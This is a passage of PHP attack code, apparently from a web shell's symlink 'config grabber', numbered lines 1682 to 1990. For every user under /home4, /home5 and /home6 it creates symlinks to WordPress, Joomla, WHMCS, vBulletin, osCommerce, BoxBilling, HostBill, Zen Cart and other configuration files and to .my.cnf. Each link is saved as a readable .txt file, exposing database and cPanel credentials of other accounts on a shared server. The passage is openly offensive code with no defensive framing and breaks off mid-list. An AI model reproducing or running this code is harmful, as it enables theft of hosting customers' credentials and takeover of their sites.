  1682. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1683. @symlink('/home4/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1684. @symlink('/home4/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1685.  
  1686. //home5
  1687.  
  1688. @symlink('/home5/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1689. @symlink('/home5/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1690. @symlink('/home5/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1691. @symlink('/home5/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1692. @symlink('/home5/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1693. @symlink('/home5/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1694. @symlink('/home5/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1695. @symlink('/home5/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1696. @symlink('/home5/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1697. @symlink('/home5/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1698. @symlink('/home5/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1699. @symlink('/home5/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1700. @symlink('/home5/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1701. @symlink('/home5/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1702. @symlink('/home5/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1703. @symlink('/home5/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1704. @symlink('/home5/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1705. @symlink('/home5/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1706. @symlink('/home5/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1707. @symlink('/home5/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1708. @symlink('/home5/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1709. @symlink('/home5/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1710. @symlink('/home5/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1711. @symlink('/home5/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1712. @symlink('/home5/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1713. @symlink('/home5/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1714. @symlink('/home5/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1715. @symlink('/home5/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1716. @symlink('/home5/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1717. @symlink('/home5/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1718. @symlink('/home5/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1719. @symlink('/home5/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1720. @symlink('/home5/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1721. @symlink('/home5/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1722. @symlink('/home5/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1723. @symlink('/home5/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1724. @symlink('/home5/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1725. @symlink('/home5/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1726. @symlink('/home5/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1727. @symlink('/home5/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1728. @symlink('/home5/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1729. @symlink('/home5/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1730. @symlink('/home5/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1731. @symlink('/home5/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1732. @symlink('/home5/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1733. @symlink('/home5/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1734. @symlink('/home5/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1735. @symlink('/home5/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1736. @symlink('/home5/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1737. @symlink('/home5/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1738. @symlink('/home5/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1739. @symlink('/home5/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1740. @symlink('/home5/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1741. @symlink('/home5/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1742. @symlink('/home5/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1743. @symlink('/home5/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1744. @symlink('/home5/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1745. @symlink('/home5/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1746. @symlink('/home5/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1747. @symlink('/home5/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1748. @symlink('/home5/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1749. @symlink('/home5/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1750. @symlink('/home5/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1751. @symlink('/home5/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1752. @symlink('/home5/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1753. @symlink('/home5/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1754. @symlink('/home5/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1755. @symlink('/home5/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1756. @symlink('/home5/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1757. @symlink('/home5/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1758. @symlink('/home5/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1759. @symlink('/home5/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1760. @symlink('/home5/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1761. @symlink('/home5/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1762. @symlink('/home5/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1763. @symlink('/home5/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1764. @symlink('/home5/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1765. @symlink('/home5/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1766. @symlink('/home5/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1767. @symlink('/home5/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1768. @symlink('/home5/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1769. @symlink('/home5/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1770. @symlink('/home5/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1771. @symlink('/home5/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1772. @symlink('/home5/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1773. @symlink('/home5/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1774. @symlink('/home5/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1775. @symlink('/home5/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1776. @symlink('/home5/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1777. @symlink('/home5/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1778. @symlink('/home5/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1779. @symlink('/home5/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1780. @symlink('/home5/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1781. @symlink('/home5/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1782. @symlink('/home5/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1783. @symlink('/home5/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1784. @symlink('/home5/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1785. @symlink('/home5/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1786. @symlink('/home5/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1787. @symlink('/home5/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1788. @symlink('/home5/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1789. @symlink('/home5/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1790. @symlink('/home5/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1791. @symlink('/home5/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1792. @symlink('/home5/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1793. @symlink('/home5/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1794. @symlink('/home5/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1795. @symlink('/home5/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1796. @symlink('/home5/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1797. @symlink('/home5/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1798. @symlink('/home5/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1799. @symlink('/home5/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1800. @symlink('/home5/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1801. @symlink('/home5/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1802. @symlink('/home5/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1803. @symlink('/home5/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1804. @symlink('/home5/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1805. @symlink('/home5/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1806. @symlink('/home5/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1807. @symlink('/home5/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1808. @symlink('/home5/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1809. @symlink('/home5/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1810. @symlink('/home5/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1811. @symlink('/home5/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1812. @symlink('/home5/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1813. @symlink('/home5/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1814. @symlink('/home5/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1815. @symlink('/home5/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1816. @symlink('/home5/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1817. @symlink('/home5/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1818. @symlink('/home5/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1819. @symlink('/home5/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1820. @symlink('/home5/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1821. @symlink('/home5/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1822. @symlink('/home5/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1823. @symlink('/home5/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1824. @symlink('/home5/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1825. @symlink('/home5/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1826. @symlink('/home5/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1827. @symlink('/home5/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1828. @symlink('/home5/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1829. @symlink('/home5/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1830. @symlink('/home5/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1831. @symlink('/home5/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1832. @symlink('/home5/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1833. @symlink('/home5/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1834. @symlink('/home5/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1835. @symlink('/home5/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1836. @symlink('/home5/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1837. @symlink('/home5/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1838. @symlink('/home5/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1839. @symlink('/home5/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1840. @symlink('/home5/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1841. @symlink('/home5/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1842. @symlink('/home5/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1843. @symlink('/home5/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1844. @symlink('/home5/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1845. @symlink('/home5/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1846. @symlink('/home5/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1847. @symlink('/home5/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1848. @symlink('/home5/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1849. @symlink('/home5/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1850. @symlink('/home5/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1851. @symlink('/home5/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1852. @symlink('/home5/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1853. @symlink('/home5/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1854. @symlink('/home5/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1855. @symlink('/home5/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1856. @symlink('/home5/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1857. @symlink('/home5/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1858. @symlink('/home5/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1859. @symlink('/home5/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1860. @symlink('/home5/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1861. @symlink('/home5/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1862. @symlink('/home5/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1863. @symlink('/home5/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1864. @symlink('/home5/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1865. @symlink('/home5/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1866. @symlink('/home5/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1867. @symlink('/home5/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1868. @symlink('/home5/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1869. @symlink('/home5/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1870.  
  1871. //home6
  1872.  
  1873. @symlink('/home6/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1874. @symlink('/home6/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1875. @symlink('/home6/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1876. @symlink('/home6/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1877. @symlink('/home6/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1878. @symlink('/home6/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1879. @symlink('/home6/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1880. @symlink('/home6/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1881. @symlink('/home6/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1882. @symlink('/home6/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1883. @symlink('/home6/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1884. @symlink('/home6/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1885. @symlink('/home6/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1886. @symlink('/home6/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1887. @symlink('/home6/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1888. @symlink('/home6/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1889. @symlink('/home6/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1890. @symlink('/home6/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1891. @symlink('/home6/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1892. @symlink('/home6/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1893. @symlink('/home6/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1894. @symlink('/home6/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1895. @symlink('/home6/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1896. @symlink('/home6/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1897. @symlink('/home6/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1898. @symlink('/home6/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1899. @symlink('/home6/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1900. @symlink('/home6/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1901. @symlink('/home6/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1902. @symlink('/home6/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1903. @symlink('/home6/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1904. @symlink('/home6/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1905. @symlink('/home6/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1906. @symlink('/home6/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1907. @symlink('/home6/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1908. @symlink('/home6/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1909. @symlink('/home6/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1910. @symlink('/home6/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1911. @symlink('/home6/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1912. @symlink('/home6/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1913. @symlink('/home6/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1914. @symlink('/home6/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1915. @symlink('/home6/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1916. @symlink('/home6/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1917. @symlink('/home6/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1918. @symlink('/home6/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1919. @symlink('/home6/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1920. @symlink('/home6/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1921. @symlink('/home6/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1922. @symlink('/home6/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1923. @symlink('/home6/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1924. @symlink('/home6/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1925. @symlink('/home6/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1926. @symlink('/home6/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1927. @symlink('/home6/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1928. @symlink('/home6/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1929. @symlink('/home6/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1930. @symlink('/home6/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1931. @symlink('/home6/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1932. @symlink('/home6/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1933. @symlink('/home6/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1934. @symlink('/home6/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1935. @symlink('/home6/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1936. @symlink('/home6/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1937. @symlink('/home6/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1938. @symlink('/home6/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1939. @symlink('/home6/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1940. @symlink('/home6/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1941. @symlink('/home6/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1942. @symlink('/home6/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1943. @symlink('/home6/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1944. @symlink('/home6/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1945. @symlink('/home6/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1946. @symlink('/home6/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1947. @symlink('/home6/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1948. @symlink('/home6/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1949. @symlink('/home6/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1950. @symlink('/home6/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1951. @symlink('/home6/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1952. @symlink('/home6/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1953. @symlink('/home6/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1954. @symlink('/home6/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1955. @symlink('/home6/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1956. @symlink('/home6/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1957. @symlink('/home6/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1958. @symlink('/home6/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1959. @symlink('/home6/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1960. @symlink('/home6/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1961. @symlink('/home6/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1962. @symlink('/home6/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1963. @symlink('/home6/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1964. @symlink('/home6/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1965. @symlink('/home6/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1966. @symlink('/home6/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1967. @symlink('/home6/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1968. @symlink('/home6/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1969. @symlink('/home6/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1970. @symlink('/home6/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1971. @symlink('/home6/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1972. @symlink('/home6/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1973. @symlink('/home6/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1974. @symlink('/home6/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1975. @symlink('/home6/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1976. @symlink('/home6/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1977. @symlink('/home6/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1978. @symlink('/home6/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1979. @symlink('/home6/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1980. @symlink('/home6/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1981. @symlink('/home6/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1982. @symlink('/home6/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1983. @symlink('/home6/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1984. @symlink('/home6/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1985. @symlink('/home6/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1986. @symlink('/home6/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1987. @symlink('/home6/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1988. @symlink('/home6/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1989. @symlink('/home6/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1990. @symlink('/home6/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
